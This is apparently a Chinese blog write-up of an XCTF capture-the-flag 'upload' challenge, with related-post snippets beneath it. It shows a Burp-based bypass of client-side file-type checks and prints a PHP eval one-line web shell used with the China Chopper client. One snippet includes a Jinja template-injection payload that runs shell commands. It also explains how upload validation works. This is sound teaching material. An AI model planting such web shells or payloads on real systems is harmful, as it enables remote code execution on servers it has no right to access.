XCTF攻防世界web进阶练习_ 4_upload

最新推荐文章于 2025-05-11 23:52:54 发布
最新推荐文章于 2025-05-11 23:52:54 发布
阅读量2.4k 收藏 4
点赞数 1
CC 4.0 BY-SA版权
分类专栏: ctf_web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/silence1_/article/details/89738937
本文围绕XCTF攻防世界web进阶练习upload题目展开,先通过修改文件后缀和抓包改包绕过客户端验证成功上传php文件并连接菜刀获取flag。还介绍了文件上传漏洞,以及上传验证分为客户端和服务器端验证,阐述了服务器端对文件名检验的白名单和黑名单机制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XCTF攻防世界web进阶练习—upload

题目

题目为updoad,是上传的意思,应该是文件上传相关题目

打开题目,不出意料,要求上传文件。在这里插入图片描述
这里先试着随便上传一个php文件,试试水
在这里插入图片描述
弹出一个弹窗,提示要求上传一个图片
注意:这里是弹窗提示,所以考虑是js过滤。
所以传入一个内容为php,后缀为jpg文件上传,用burp抓包
在这里插入图片描述
将filename改为pino.php,内容为phpinfo()
go! 成功上传!并返回了上传位置为upload/1556697521.pino.php
在这里插入图片描述
去到upload/1556697521.pino.php看看upload/1556697521.pino.php
看来成功上传并执行了php中的内容。

接下来上传简单的一句话,并将上传文件名字改为abc.php

<?php @eval($_POST['chopper']);?>

在这里插入图片描述

依旧成功上传,路径为upload/1556698010.abc.php
接下来用菜刀连接
在这里插入图片描述
成功连接!在这里插入图片描述
直接打开flag.php即可获得flag!!在这里插入图片描述

关于上传绕过

文件上传漏洞是web安全中经常利用到的一种漏洞形式。一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中,再通过url去访问以执行代码,达到不可描述的目的。
但在一些安全性较高的web应用中,往往会有各种上传限制和过滤,导致我们无法上传特定的文件。

这些验证可以分为客户端验证和服务器端验证

客户端验证

客户端验证主要是通过js来进行验证,对于这类验证方法,我们可以通过先将文件更改为它能够通过的类型或内容,然后再burpsuite抓包改包即可绕过

服务器端验证

服务器端的验证主要分为对文件名的检验和对文件内容的检验

对文件名的检验
服务器对文件名的检验就是检查上传文件的后缀名,若有非法的后缀名就将其拦截。这类检验可以分为白名单检验和黑名单检验。

白名单检验就是只有服务器名单上的后缀名才能够上传。
黑名单检验就是在黑名单中的文件后缀不能上传。

想要了解更多可以参考:
https://thief.one/2016/09/22/上传木马姿势汇总
https://www.cnblogs.com/ssooking/articles/6567912.html
http://byd.dropsec.xyz/2017/02/21/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-%E7%BB%95%E8%BF%87/

XCTF WEB upload(RCTF-2015)
A_dmin的博客
12-12 1065
XCTF WEB upload(RCTF-2015) 两百多天未解决的问题了,,,, 打开题目,发现需要登录注册,,注册登陆之后需要我们进行文件上传: 估摸着登录页面与注册页面没有漏洞,,,,,毕竟题目提示就是让我们上传,, 上传的套路都试过,只能上传jpg图片,,,,其他一律不行,,,而且不知道路径为多少,,, jpg图片上传成功之后有个提示: 奇怪的uid,,,,,数据库编号之类的,,,...
攻防世界 web进阶upload
weixin_42499640的博客
07-18 1537
这道题的大体思路是: 利用上传文件的文件名进行sql注入 这里先普及几个mysql函数的用法 1. CONV() 简单的来说这个函数就是用来进行***进制的转换***的 CONV(N,from_base,to_base) N是要转换的数据,from_base是原进制,to_base是目标进制。 select conv(16,10,16)...
XCTF-upload
aaeoj8957的博客
07-10 229
这道题的话,看了一下是RCTF-2015的原题。。。。可是这也太难了吧QAQ,文件名作为注入点可也是太秀了,害的我一直以为是文件上传QAQ,并且这道题的坑还不少,就是注入时的输出只能为10进制。。。。。这也就是说还需要你进行一下进制转换。。。 还有这里面将select和from过滤了一次。。。你还需要双写,,,哎。心累 一遍遍的fuzz的话,不知道要弄到什么时候。幸...
攻防世界upload1的保姆级解题思路
最新发布
2403_88486149的博客
05-11 257
3.在notepad++上编辑,输入以下代码(其中'1'是密码,你也可以写其他的密码)并保存。2.建立一个文本文档,后缀为png(因为题目要求上传的是图片,这里我建立的名字为1.png)9.地址是刚刚我们复制的那个,密码是前面设置的1写完后测试连接,连接成功后点击添加。10.点开我们添加好数据,在里面找有flag的标志就是我们要找的flag。6.把filename的后缀名改成.php,然后放行。保持拦截关闭,打开浏览器打开复制的地址。7.然后把红圈圈的换成标蓝的。5.然后进行抓包,打开拦截。
攻防世界XCTFupload
末初 · mochu7
03-08 992
这里有个注册登入,迷惑行为,漏洞不在这里 这题比较意外,不是上传题是sql注入而且还是文件名的SQL注入, 因为回显的只是文件名,然后它存入数据库的也可能是文件名,既然连接了数据库就可能存在注入漏洞。然后就能想到可能是文件名sql注入。 任何与数据库发生连接交互的地方都可能存在SQL注入! 然后就开始构造文件名的payload,首先介绍几个函数。 conv(N,from_base,to_ba...
攻防世界-web-wzsc_文件上传
mlws1900的博客
08-24 4510
1、网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除该文件。2、网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。在删除之前访问上传的php文件,从而执行上传文件中的php代码。服务器获取文件>>>保存上传临时文件>>>重命名移动临时文件。可以看到shell已经被上传,用蚁剑连接。上传一个空内容的jpg文件,上传成功。打开环境,很简单的上传界面。1. 文件上传过程介绍。例如:上传文件代码如下。此为需要上传的文件内容。利用条件竞争文件上传。
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1195
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
[XCTF]攻防世界Web_python_template_injection模板注入
qq_37301470的博客
11-20 3655
模板注入 在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload: http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
攻防世界 Crypto进阶 Handicraft_RSA
qtL0ng的博客
06-02 1447
1、题目 #!/usr/bin/python from Crypto.Util.number import * from Crypto.PublicKey import RSA from secret import s, FLAG def gen_prime(s): while True: r = getPrime(s) #生成一个素数r R = [r] #将r转换为列表 t = int(5 * s / 2) + 1 for i i
攻防世界 web高手进阶10分题 Background_Management_System
闵行小鱼塘
10-21 1153
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Background_Management_System的writeup
攻防世界 XCTFWEB 高手进阶 upload1 ——卖菜刀,上蚁剑
algae
05-03 581
<!Doctype html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script type="text/javascript"> Array.prototype.contains = funct...
XCTF攻防世界题目upload(RCTF-2015)
daqiangdetianxia的博客
08-12 795
upload 信息搜集 dirsearch目录扫描,发现classes目录 然后进入classes目录,发现password.php user.php文件夹 中间件和服务器:Apache/2.4.7 (Ubuntu) 尝试 用sqlmap对登录和注册页面进行注入,发现不行。 注册后进行登录,发现有一个文件上传页面。可能是一个文件上传漏洞。 上传一句话木马,找不到上传后的文件夹,于是通过猜测上传文件夹名称,找不到,于是放弃文件上传漏洞。 文件上传后发现 ...
攻防世界web进阶区之bug
qq_45756971的博客
08-05 500
题目如图所示:打开题目所给链接,会发现一个登陆界面我们先注册 然后登陆,成功点击manage会发现弹出对话框我们返回登录界面还发现一个fiadwd找回密码界面,输入信息,修改密码是用burp抓包抓包修改账户密码重置管理员密码成功。登录账号。再点击manage又弹出一个对话框所以我们在抓的包中添加一个 X-Forwarded-For: 127.0.0.1,发现传参:index.php?module=filemanage&do=???,我们根据题目猜测是upload,传参试试先传参成功,我们选择一个p
攻防世界web进阶区bug
gongjingege的博客
08-07 318
打开靶场,出现登录框,SQL注入无果,老老实实注册 注册成功,登录 点击manage,显示要admin管理员 考虑在findpwd里先修改自己的账号,bp抓包,改掉admin的密码 bp抓包 username改成admin,密码随便 可以看到修改成功 管理员新密码登录 再次点击manage emmmm继续改 bp抓包,X-Forwarded-For:127.0.0.1 这个时候从源代码里看到,又给了个新的路径,do=??? filename想到增删改查,多试几次,是upload 上传文件,是一句话
攻防世界web进阶upload1
gongjingege的博客
07-17 468
文件上传与绕过,一句话木马,菜刀 打开链接后,出来一个上传框,先查看源代码 可以看出只能上传jpg,png格式的文件 用bp抓包,一句话,菜刀直接得到flag 新建一个txt,一句话,后缀改为jpg 在上传中用bp抓包 将fk.jpg改为fk.php,实现对文件格式要求的绕过 菜刀获取目录下的文件 得到flag 还不能熟练了解使用这些工具,对漏洞不了解,继续努力(ง •_•)ง 2020.7.17 公瑾 ...
xctf攻防世界 Web高手进阶区 bug
l8947943的博客
01-02 1169
1. 进入环境,查看内容 我们先注册一个玩玩,然后登录如图: 一个个点一遍,发现manage有问题,如图: 明白了,暗示我们需要拿到admin权限,然后再搞事情 2. 开始分析 如何拿到admin?在用户页面发现有个change pwd,如图: 我们抓包试试,看看内容,发现并没有提供有效的修改user信息,如图: 也就是默认这个页面锁定了登录用户,不允许修改user的用户名,于是继续尝试 我们发现主页还有个Findpwd 填写完响应的信息后,如图: 点击reset抓包,看看内容:
XCTF攻防世界web进阶练习_ 5_bug
silence1_的博客
09-22 1530
XCTF攻防世界web进阶练习—bug 题目 题目名字是bug 进入题目是一个登录界面 这里提供了注册和找回密码的功能,简单测试了一下sql注入,无果。 联想到题目名字是bug,应该和网站逻辑问题有关。 注册一个账号,这里我注册为admins password 注册好之后当然是登录啦,登录进去之后有几个功能。其中值的注意的是manage和change pwd 发现manage要管理员权限,...
攻防世界XCTFupload1
末初 · mochu7
03-08 822
前端验证,直接删除掉这段代码,或者浏览器关闭JS,然后上传webshell即可 啥函数都没有禁用,直接找flag cat了flag.php但是没有回显,可能是一个变量,查看一下源码 ...
XCTF-WEB进阶-fakebook
02-28
### XCTF WEB进阶 Fakebook 解题报告 #### 源码分析 Fakebook 类似于社交网络平台,在此环境中存在多个功能模块,包括但不限于用户注册、登录以及个人信息管理等功能。通过查看源代码发现,该应用可能存在多种安全漏洞。 对于假想的 `fakebook` 平台而言,其核心逻辑通常围绕着用户的会话管理和数据交互展开。假设存在如下简化版 PHP 伪代码表示部分关键业务流程: ```php <?php class User { public $username; public $password; function login($input_username, $input_password){ // 存在一个潜在的安全隐患:未对输入做严格验证 if ($this->username === $input_username && md5($input_password) === $this->password){ $_SESSION['logged_in'] = true; return "Login successful"; } return "Invalid credentials"; } } ?> ``` 上述代码片段展示了用户认证过程中可能存在的安全隐患——使用弱哈希算法 MD5 对密码进行了处理[^1]。 #### 安全问题剖析 基于以上描述可以推测出几个主要攻击面: - **弱哈希函数**:MD5 已经被证明不再适合用于保护敏感信息,因为它容易受到碰撞攻击的影响。 - **缺乏输入过滤机制**:未能有效防止恶意字符进入系统内部,这可能导致 SQL 注入或其他类型的注入攻击发生。 - **不恰当的错误消息返回**:当用户名或密码错误时给出的具体提示可能会帮助攻击者缩小猜测范围。 #### 利用技巧 针对这些弱点,参赛选手可以从以下几个方面入手尝试突破并解决问题: - 尝试暴力破解或者彩虹表查找已知 MD5 值对应的原始字符串; - 测试是否存在其他形式的数据注入风险点,比如 URL 参数、POST 请求体内的字段等位置; - 探索是否有任何地方暴露出过多调试信息给外部访问者利用; 成功完成挑战后一般可以获得 flag 或者进一步的操作权限作为奖励。 #### 复现过程 为了模拟真实的渗透测试场景,建议按照以下方式构建实验环境来进行练习: 1. 构建一个类似的 Web 应用程序框架,确保其中包含了所有必要的组件和服务依赖关系; 2. 实施相应的防护措施来抵御常见的Web 攻击手段,如 XSS 和 CSRF 等; 3. 使用工具辅助自动化执行某些特定任务,例如 Hydra 可以用来实施字典攻击尝试登陆接口; 4. 记录每一步操作细节以便后续总结经验教训,并分享给社区成员共同学习进步。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值